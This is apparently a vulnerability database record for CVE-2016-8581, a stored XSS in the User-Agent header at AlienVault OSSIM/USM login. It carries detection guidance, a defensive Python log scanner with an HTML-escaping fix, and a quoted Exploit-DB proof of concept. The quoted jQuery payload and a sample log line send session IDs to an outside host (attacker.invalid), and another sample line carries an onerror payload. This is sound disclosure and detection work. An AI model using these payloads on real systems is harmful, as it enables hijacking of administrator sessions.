CVE-2016-8581
Published: 2016-10-28
Priority: P3 (47) · CVSS 3.0: 6.1 (medium)
Exploit available: yes
EPSS: 17.06% (96.7th percentile)
A persistent XSS vulnerability exists in the User-Agent header of the login process of AlienVault OSSIM and USM before 5.3.2 that allows an attacker to steal session IDs of logged in users when the current sessions are viewed by an administrator.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| alienvault | open_source_security_information_and_event_management | <= 5.3.1 | — |
| alienvault | unified_security_management | <= 5.3.1 | — |
Detection & IOCs (extracted from sources)
- Monitor HTTP login requests for JavaScript payloads injected into the User-Agent header, particularly those containing jQuery $.get() calls or session-harvesting patterns targeting the 'Current Sessions' page.
- Alert on User-Agent header values containing HTML/JavaScript tags (e.g., <script>, jQuery selectors, $.get, $.post) in authentication requests to AlienVault OSSIM/USM login endpoints.
- Inspect the 'Current Sessions' admin page (#ops_table .ops_id) for unexpected outbound GET requests triggered by stored XSS payloads in User-Agent fields.
- The PoC exfiltrates session IDs to an attacker-controlled external URL via HTTP GET with a 'session' parameter; the Google URL in the PoC is a placeholder, and real attacks would use an attacker-controlled domain.
- Affected versions are AlienVault OSSIM and USM prior to 5.3.2; the vulnerability is fixed in version 5.3.2.
- The Metasploit module (alienvault_sqli_exec.rb) referenced in the sources targets a different CVE (SQL injection + RCE in OSSIM ≤4.3.1) and is NOT directly related to CVE-2016-8581; treat its intel separately.
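The following is an added example, not part of this record or of any AlienVault code, showing the detection guidance above in working form: it parses constructed Apache combined-format access log lines, checks the User-Agent of requests to the login endpoint for the markup and jQuery indicators listed above, and shows the output-encoding step that the 'Current Sessions' page needs so a stored User-Agent cannot run as script. The login path `/login`, the client addresses and every log line are constructed placeholders; the real OSSIM/USM login endpoint is not given on this page.

```python
import html
import re
from typing import Dict, List

# Indicators of markup or script inside a User-Agent value, taken from the
# detection guidance above: <script> tags, inline event handlers, jQuery
# selectors and jQuery AJAX calls ($.get / $.post), and javascript: URIs.
UA_INDICATORS = {
    "script_tag": re.compile(r"<\s*/?\s*script\b", re.I),
    "event_handler": re.compile(r"<\s*\w+[^>]*\bon\w+\s*=", re.I),
    "jquery_selector": re.compile(r"\$\(\s*['\"]"),
    "jquery_ajax": re.compile(r"\$\.(get|post|ajax|getJSON)\s*\("),
    "js_uri": re.compile(r"javascript\s*:", re.I),
}

# Apache "combined" log format. The User-Agent field may contain \" escapes,
# which the PoC above produces, so the UA group allows backslash-escaped chars.
COMBINED_LOG = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" '
    r'"(?P<ua>(?:[^"\\]|\\.)*)"$'
)

# Constructed sample log. Line 2 carries the page's PoC pointed at a
# placeholder domain; line 4 carries an inline event handler variant.
# "/login" is an assumed path, not the product's real endpoint.
SAMPLE_LOG = r'''
203.0.113.10 - - [03/Aug/2016:10:15:01 +0000] "POST /login HTTP/1.1" 302 0 "https://siem.example.test/" "Mozilla/5.0 (X11; Linux x86_64) Firefox/48.0"
203.0.113.77 - - [03/Aug/2016:10:16:44 +0000] "POST /login HTTP/1.1" 302 0 "-" "<script>$('#ops_table .ops_id').each(function(){$.get(\"https://attacker.invalid/\",{session:($(this).html())});});</script>"
198.51.100.5 - - [03/Aug/2016:10:17:09 +0000] "GET /ossim/ HTTP/1.1" 200 4123 "-" "curl/7.47.0"
203.0.113.78 - - [03/Aug/2016:10:18:30 +0000] "POST /login HTTP/1.1" 200 812 "-" "Mozilla/5.0 <img src=x onerror=alert(1)>"
'''


def user_agent_indicators(ua: str) -> List[str]:
    """Return the names of every indicator pattern that matches the UA string."""
    return [name for name, rx in UA_INDICATORS.items() if rx.search(ua)]


def scan_access_log(text: str, login_path: str = "/login") -> List[Dict]:
    """Flag requests to the login endpoint whose User-Agent carries markup/script.

    Only login requests are checked because that is where the stored value
    enters the application; other paths can be added if the app logs them.
    """
    alerts = []
    for line in text.splitlines():
        m = COMBINED_LOG.match(line)
        if not m or login_path not in m["request"]:
            continue
        ua = m["ua"].replace('\\"', '"')  # undo the log writer's quote escaping
        hits = user_agent_indicators(ua)
        if hits:
            alerts.append({"ip": m["ip"], "ts": m["ts"], "ua": ua, "indicators": hits})
    return alerts


def safe_session_cell(ua: str) -> str:
    """The mitigation for the admin page: HTML-encode the stored User-Agent
    before placing it in the sessions table, so a stored payload renders as
    text instead of executing in the administrator's browser."""
    return '<td class="ops_ua">%s</td>' % html.escape(ua, quote=True)


if __name__ == "__main__":
    for alert in scan_access_log(SAMPLE_LOG):
        print(alert["ts"], alert["ip"], ",".join(alert["indicators"]))
        print("  rendered safely as:", safe_session_cell(alert["ua"]))
```

On the constructed sample, the two login requests carrying a `<script>` block and an inline event handler are flagged while the ordinary browser and curl entries pass; the encoded cell shows how the same stored value looks once the sessions page escapes it.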
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.0 | 6.1 | MEDIUM | CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
| nvd | 2.0 | 4.3 | MEDIUM | AV:N/AC:M/Au:N/C:N/I:P/A:N |
No detection rules found.
Exploit-DB
Alienvault OSSIM/USM 5.3.1 - Persistent Cross-Site Scripting
exploitdb · 2016-11-02 · CVSS 6.1
---
Details
Product: Alienvault OSSIM/USM
Vulnerability: Stored XSS
Author: Peter Lapp, lappsec () gmail com
CVE: CVE-2016-8581
CVSS: 3.5
Vulnerable Versions: Current Sessions.
POC
===
The POC uses jQuery to send all session IDs on the "Current Sessions"
page to an arbitrary site (Google, in this case)

```javascript
$('#ops_table .ops_id').each(function(){$.get("https://www.google.com/",{session:($(this).html())});});
```
Timeline
08/03/16 - Reported to Vendor
10/03/16 - Fixed in version 5.3.2
References
https://www.alienvault.com/forums/discussion/7766/security-advisory-alienvault-5-3-2-address-70-vulnerabilities
Metasploit
AlienVault OSSIM SQL Injection and Remote Code Execution
This module exploits an unauthenticated SQL injection vulnerability affecting AlienVault OSSIM versions 4.3.1 and lower. The SQL injection issue can be abused in order to retrieve an active admin session ID. If an administrator level user is identified, remote code execution can be gained by creating a high priority policy with an action containing our payload.
No writeups or analysis indexed.
References
- http://www.securityfocus.com/bid/93862
- https://www.alienvault.com/forums/discussion/7766/security-advisory-alienvault-5-3-2-address-70-vulnerabilities
- https://www.exploit-db.com/exploits/40683/